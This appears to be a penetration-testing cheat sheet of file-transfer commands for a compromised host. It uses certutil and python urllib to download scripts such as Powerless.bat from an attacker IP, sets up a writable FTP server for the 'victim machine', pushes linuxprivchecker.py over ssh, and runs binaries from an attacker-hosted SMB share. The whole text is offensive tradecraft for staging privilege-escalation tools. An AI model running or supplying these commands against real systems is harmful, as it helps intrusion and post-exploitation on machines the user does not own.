certutil.exe -urlcache -split -f "http://10.11.0.98/Powerless.bat" Powerless.bat
pip install pyftpdlib
python -m pyftpdlib -p 21 -w
# On victim machine
ftp [email protected]
ftp -A %ATTACKER_IP%
# switch to binary mode
binary
get <file-name>
ftp $TARGET_IP
*It seems not working for large binary file.
python -c "import urllib; print urllib.urlopen('http://10.11.0.98/<filename>').read()" > <filename>
ssh [email protected] "cat > linuxprivchecker.py" < linuxprivchecker.py
smbserver.py a /usr/share/windows-binaries/
C:\> \\10.11.0.x\a\whoami.exe